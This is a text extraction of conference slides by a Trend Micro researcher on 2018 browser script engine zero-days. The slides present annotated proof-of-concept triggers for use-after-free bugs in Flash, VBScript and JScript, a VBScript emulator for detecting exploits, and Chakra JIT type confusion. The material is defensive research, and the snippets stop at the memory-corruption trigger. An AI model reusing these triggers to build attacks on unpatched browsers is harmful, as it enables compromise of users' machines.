Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim...
Transcript of Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim...
![Page 1: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/1.jpg)
Browser Script Engine Zero Days in 2018
Elliot Cao
Trend Micro
2019-05-30
![Page 2: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/2.jpg)
Whoami
• Previous occupation is electrical engineer
• Joined in Trend Micro in 2017
• Sandbox developer
• Started browser vulnerability research in 2018
• Focus on browser script engine
• Lei Cao (@elli0tn0phacker)
![Page 3: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/3.jpg)
Agenda
• Browser Zero Days in 2018
• VBSEmulator
• Chakra
![Page 4: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/4.jpg)
Browser Zero Days in 2018
![Page 5: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/5.jpg)
Browser Zero Days in 2018
• Flash: CVE-2018-4878 CVE-2018-15982
• VBScript: CVE-2018-8174 CVE-2018-8373
• JScript: CVE-2018-8653
![Page 6: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/6.jpg)
Flash Zero Days in 2018
• CVE-2018-4878
var psdk:PSDK = PSDK.pSDK;
var psdk_dispatcher:PSDKEventDispatcher = psdk.createDispatcher();
this.mediaPlayer = psdk.createMediaPlayer(psdk_dispatcher);
this.my_DRMListerner = new DRMOperationCompleteListener ();
this.mediaPlayer.drmManager.initialize(this.my_DRMListerner);
this.my_DRMListerner = null;
try {
new LocalConnection().connect("foo");
new LocalConnection().connect("foo");
}
catch (e:Error) {
my_DRMListerner_vuln = new DRMOperationCompleteListener ();
}
![Page 7: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/7.jpg)
Flash Zero Days in 2018
• CVE-2018-4878
Create an Object
var psdk:PSDK = PSDK.pSDK;
var psdk_dispatcher:PSDKEventDispatcher = psdk.createDispatcher();
this.mediaPlayer = psdk.createMediaPlayer(psdk_dispatcher);
this.my_DRMListerner = new DRMOperationCompleteListener ();
this.mediaPlayer.drmManager.initialize(this.my_DRMListerner);
this.my_DRMListerner = null;
try {
new LocalConnection().connect("foo");
new LocalConnection().connect("foo");
}
catch (e:Error) {
my_DRMListerner_vuln = new DRMOperationCompleteListener ();
}
![Page 8: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/8.jpg)
var psdk:PSDK = PSDK.pSDK;
var psdk_dispatcher:PSDKEventDispatcher = psdk.createDispatcher();
this.mediaPlayer = psdk.createMediaPlayer(psdk_dispatcher);
this.my_DRMListerner = new DRMOperationCompleteListener ();
this.mediaPlayer.drmManager.initialize(this.my_DRMListerner);
this.my_DRMListerner = null;
try {
new LocalConnection().connect("foo");
new LocalConnection().connect("foo");
}
catch (e:Error) {
my_DRMListerner_vuln = new DRMOperationCompleteListener ();
}
Flash Zero Days in 2018
• CVE-2018-4878
Free the Object
![Page 9: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/9.jpg)
Flash Zero Days in 2018
• CVE-2018-4878
Reuse free memory
Trigger GC,
Get a dangling pointer
my_DRMListerner_vuln
var psdk:PSDK = PSDK.pSDK;
var psdk_dispatcher:PSDKEventDispatcher = psdk.createDispatcher();
this.mediaPlayer = psdk.createMediaPlayer(psdk_dispatcher);
this.my_DRMListerner = new DRMOperationCompleteListener ();
this.mediaPlayer.drmManager.initialize(this.my_DRMListerner);
this.my_DRMListerner = null;
try {
new LocalConnection().connect("foo");
new LocalConnection().connect("foo");
}
catch (e:Error) {
my_DRMListerner_vuln = new DRMOperationCompleteListener ();
}
![Page 10: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/10.jpg)
Flash Zero Days in 2018
• CVE-2018-15982
var ba:ByteArray = new ByteArray();
var md:Metadata = new Metadata();
var arr_key:* = null;
i = 0;
while (i < 0x100) {
md.setObject(i.toString(), ba);
i++;
}
try{
new LocalConnection().connect("foo");
new LocalConnection().connect("foo");
}
catch (e:Error){}
arr_key = md.keySet;
![Page 11: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/11.jpg)
Flash Zero Days in 2018
• CVE-2018-15982
var ba:ByteArray = new ByteArray();
var md:Metadata = new Metadata();
var arr_key:* = null;
i = 0;
while (i < 0x100) {
md.setObject(i.toString(), ba);
i++;
}
try{
new LocalConnection().connect("foo");
new LocalConnection().connect("foo");
}
catch (e:Error){}
arr_key = md.keySet;
Create some String object
and save them to Metadata
![Page 12: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/12.jpg)
Flash Zero Days in 2018
• CVE-2018-15982
var ba:ByteArray = new ByteArray();
var md:Metadata = new Metadata();
var arr_key:* = null;
i = 0;
while (i < 0x100) {
md.setObject(i.toString(), ba);
i++;
}
try{
new LocalConnection().connect("foo");
new LocalConnection().connect("foo");
}
catch (e:Error){}
arr_key = md.keySet;
![Page 13: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/13.jpg)
Flash Zero Days in 2018
• CVE-2018-15982
var ba:ByteArray = new ByteArray();
var md:Metadata = new Metadata();
var arr_key:* = null;
i = 0;
while (i < 0x100) {
md.setObject(i.toString(), ba);
i++;
}
try{
new LocalConnection().connect("foo");
new LocalConnection().connect("foo");
}
catch (e:Error){}
arr_key = md.keySet;
Trigger GC
![Page 14: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/14.jpg)
Flash Zero Days in 2018
• CVE-2018-15982
var ba:ByteArray = new ByteArray();
var md:Metadata = new Metadata();
var arr_key:* = null;
i = 0;
while (i < 0x100) {
md.setObject(i.toString(), ba);
i++;
}
try{
new LocalConnection().connect("foo");
new LocalConnection().connect("foo");
}
catch (e:Error){}
arr_key = md.keySet; Get dangling pointers
arr_key
![Page 15: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/15.jpg)
VBScript Zero Days in 2018
• CVE-2018-8174
Dim arr(1)
Dim o
Class MyClass
Private Sub Class_Terminate
Set o = arr(0)
arr(0) = &h12345678
End Sub
End Class
Set arr(0) = New MyClass
Erase arr
msgbox o
![Page 16: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/16.jpg)
VBScript Zero Days in 2018
• CVE-2018-8174
Dim arr(1)
Dim o
Class MyClass
Private Sub Class_Terminate
Set o = arr(0)
arr(0) = &h12345678
End Sub
End Class
Set arr(0) = New MyClass
Erase arr
msgbox o
Create one MyClass object
and save its pointer to arr(0)
![Page 17: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/17.jpg)
VBScript Zero Days in 2018
• CVE-2018-8174
Dim arr(1)
Dim o
Class MyClass
Private Sub Class_Terminate
Set o = arr(0)
arr(0) = &h12345678
End Sub
End Class
Set arr(0) = New MyClass
Erase arr
msgbox o
![Page 18: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/18.jpg)
VBScript Zero Days in 2018
• CVE-2018-8174
Dim arr(1)
Dim o
Class MyClass
Private Sub Class_Terminate
Set o = arr(0)
arr(0) = &h12345678
End Sub
End Class
Set arr(0) = New MyClass
Erase arr
msgbox o
Save MyClass object
pointer to variable o
![Page 19: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/19.jpg)
VBScript Zero Days in 2018
• CVE-2018-8174
Dim arr(1)
Dim o
Class MyClass
Private Sub Class_Terminate
Set o = arr(0)
arr(0) = &h12345678
End Sub
End Class
Set arr(0) = New MyClass
Erase arr
msgbox o Get a dangling pointer
![Page 20: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/20.jpg)
VBScript Zero Days in 2018
• CVE-2018-8373
Dim arr()
ReDim arr(2)
Class MyClass
Public Default Property Get P
ReDim arr(1)
End Sub
End Class
arr(2) = New MyClass
![Page 21: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/21.jpg)
VBScript Zero Days in 2018
• CVE-2018-8373
Dim arr()
ReDim arr(2)
Class MyClass
Public Default Property Get P
ReDim arr(1)
End Sub
End Class
arr(2) = New MyClass Save the arr(2) address on the stack
![Page 22: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/22.jpg)
VBScript Zero Days in 2018
• CVE-2018-8373
Dim arr()
ReDim arr(2)
Class MyClass
Public Default Property Get P
ReDim arr(1)
End Sub
End Class
arr(2) = New MyClass
![Page 23: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/23.jpg)
VBScript Zero Days in 2018
• CVE-2018-8373
Dim arr()
ReDim arr(2)
Class MyClass
Public Default Property Get P
ReDim arr(1)
End Sub
End Class
arr(2) = New MyClass
Original array buffer
will be freed by |ReDim|
![Page 24: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/24.jpg)
VBScript Zero Days in 2018
• CVE-2018-8373
Dim arr()
ReDim arr(2)
Class MyClass
Public Default Property Get P
ReDim arr(1)
End Sub
End Class
arr(2) = New MyClass Get a dangling pointer
![Page 25: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/25.jpg)
JScript Zero Days in 2018
• CVE-2018-8653
…
for (var i = 0; i < limit; i++) {
var arr = new Array({prototype:{}});
var e = new Enumerator(arr);
e.moveFirst();
refs[i] = e.item();
}
for (var i = 0; i < limit; i++) {
refs[i].prototype = {};
refs[i].prototype.isPrototypeOf = getFreeRef;
}
…
dummyObj instanceof refs[0];
![Page 26: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/26.jpg)
JScript Zero Days in 2018
• CVE-2018-8653
…
for (var i = 0; i < limit; i++) {
var arr = new Array({prototype:{}});
var e = new Enumerator(arr);
e.moveFirst();
refs[i] = e.item();
}
for (var i = 0; i < limit; i++) {
refs[i].prototype = {};
refs[i].prototype.isPrototypeOf = getFreeRef;
}
…
dummyObj instanceof refs[0];
Create an array contains object has prototype object
![Page 27: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/27.jpg)
JScript Zero Days in 2018
• CVE-2018-8653
…
for (var i = 0; i < limit; i++) {
var arr = new Array({prototype:{}});
var e = new Enumerator(arr);
e.moveFirst();
refs[i] = e.item();
}
for (var i = 0; i < limit; i++) {
refs[i].prototype = {};
refs[i].prototype.isPrototypeOf = getFreeRef;
}
…
dummyObj instanceof refs[0];
Set the prototype object isPrototypeOf
to |getFreeRef| callback
![Page 28: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/28.jpg)
JScript Zero Days in 2018
• CVE-2018-8653
…
for (var i = 0; i < limit; i++) {
var arr = new Array({prototype:{}});
var e = new Enumerator(arr);
e.moveFirst();
refs[i] = e.item();
}
for (var i = 0; i < limit; i++) {
refs[i].prototype = {};
refs[i].prototype.isPrototypeOf = getFreeRef;
}
…
dummyObj instanceof refs[0]; Trigger |getFreeRef| callback
![Page 29: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/29.jpg)
JScript Zero Days in 2018
• CVE-2018-8653
function getFreeRef() {
if (count == limit) {
…
for (var i = 0; i < limit; i++) {
refs[i].prototype = 0;
}
CollectGarbage();
} else {
dummyObj instanceof refs[count++];
}
// crash here
this;
return false;
}
recursive calls to put |this| on the stack
![Page 30: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/30.jpg)
JScript Zero Days in 2018
• CVE-2018-8653
function getFreeRef() {
if (count == limit) {
…
for (var i = 0; i < limit; i++) {
refs[i].prototype = 0;
}
CollectGarbage();
} else {
dummyObj instanceof refs[count++];
}
// crash here
this;
return false;
}
Break out and release prototype object
by garbage collection
![Page 31: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/31.jpg)
JScript Zero Days in 2018
• CVE-2018-8653
function getFreeRef() {
if (count == limit) {
…
for (var i = 0; i < limit; i++) {
refs[i].prototype = 0;
}
CollectGarbage();
} else {
dummyObj instanceof refs[count++];
}
// crash here
this;
return false;
}
|this| pointer is still saved on the stack and not tracked by GC
Get a dangling pointer
![Page 32: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/32.jpg)
VBSEmulator
![Page 33: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/33.jpg)
What is VBScript
• One script language developed by Microsoft
• Not meet ECMAScript standard
• Run in vbscript.dll
• Not open sourced
![Page 34: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/34.jpg)
How does vbscript.dll work
• Load
• Parse
• Compile
• Run
• Unload
![Page 35: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/35.jpg)
How does vbscript.dll work
• Load
• Parse
• Compile
• Run
• Unload
CScriptRuntime::RunNoEH(CScriptRuntime *__hidden this, struct VAR *)
![Page 36: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/36.jpg)
How does vbscript.dll work
• Load
• Parse
• Compile
• Run
• Unload
CScriptRuntime::RunNoEH(CScriptRuntime *__hidden this, struct VAR *)
CScriptRuntime
+0x28 Local Variables
+0x2C Function Arguments
+0xB0 Statck Pointer
+0xB4 Position Counter
+0xC0 CompiledScript
CompiledScript
+0x10 func_offset
+0x14 func_count
+0x1C bos_info
+0x28 bos_data
+0x2C bos_data_length
![Page 37: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/37.jpg)
What is VBSEmulator
• One tool can deobfuscate vbs obfuscated sample
• One tool can detect GodMode or ROP
![Page 38: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/38.jpg)
How does VBSEmulator work
Hook LoadLibrary
Init COM
Run Script
Dump Behavior
Detect Exploit
Uninitialize
Start
Hook
Break outY
N
![Page 39: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/39.jpg)
How does VBSEmulator work
Hook LoadLibrary
Init COM
Run Script
Dump Behavior
Detect Exploit
Uninitialize
Start
Hook
Break outY
N
• Functions hooked are not exported
• Need to maintain one hooked functions entry point pattern
• By hooking LoadLibrary, I can use specialized vbscript.dll
![Page 40: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/40.jpg)
How does VBSEmulator work
Hook LoadLibrary
Init COM
Run Script
Dump Behavior
Detect Exploit
Uninitialize
Start
Hook
Break outY
N
• Exploit1: GodMode
![Page 41: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/41.jpg)
How does VBSEmulator work
Hook LoadLibrary
Init COM
Run Script
Dump Behavior
Detect Exploit
Uninitialize
Start
Hook
Break outY
N
• Exploit2: ROP
![Page 42: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/42.jpg)
How does VBSEmulator work
Hook LoadLibrary
Init COM
Run Script
Dump Behavior
Detect Exploit
Uninitialize
Start
Hook
Break outY
N
• Detect Exploit1: GodMode
(1) Hook COleScript::CanObjectRun
(2) Check if safe mode flag modified
(3) If detect, throw exception and stop running ActiveX
• Detect Exploit2: ROP
(1) Hook ntdll!NtContinue
(2) Check if CONTEXT.Eip ==VirtualProtect
(3) If detect, throw exception and stop running shellcode
![Page 43: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/43.jpg)
Demo
![Page 44: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/44.jpg)
Chakra
![Page 45: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/45.jpg)
What is Chakra
• A JavaScript engine developed by Microsoft
• Used in Microsoft Edge
• Forked from Jscript9 Used in Internet Explorer
• Open sourced as ChakraCore in GitHub ☺
![Page 46: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/46.jpg)
How does Chakra work
• Parser
• Interpreter
• JIT compiler
• Garbage Collector
From: https://github.com/Microsoft/ChakraCore/wiki/Architecture-Overview
![Page 47: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/47.jpg)
Basic variable type in Chakra
• Array
• JavascriptArray
• JavascriptNativeIntArray
• JavascriptNativeFloatArray
![Page 48: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/48.jpg)
Basic variable type in Chakra
• Array
• JavascriptArray
• JavascriptNativeIntArray
• JavascriptNativeFloatArray
segment
![Page 49: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/49.jpg)
Basic variable type in Chakra
• Array
• JavascriptArray
• JavascriptNativeIntArray
• JavascriptNativeFloatArray
![Page 50: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/50.jpg)
Basic variable type in Chakra
• Array
• JavascriptArray
• JavascriptNativeIntArray
• JavascriptNativeFloatArray
![Page 51: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/51.jpg)
Basic variable type in Chakra
• Array
• Type Conversion in Array
arr[0] = {};
JavascriptNativeFloatArray
JavascriptArray
![Page 52: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/52.jpg)
Basic variable type in Chakra
• Object
• Memory layout of DynamicObject
var obj2 = {__proto__:obj1};
![Page 53: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/53.jpg)
Chakra JIT Type Confusion
From: https://bugs.chromium.org/p/project-zero/issues/list?can=1&q=chakra
![Page 54: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/54.jpg)
Chakra JIT Type Confusion
• Example
function opt(obj) {
foo(obj);
}
for(let i=0; i < 0x10000; i++) {
opt(obj1);
}
opt(obj2);
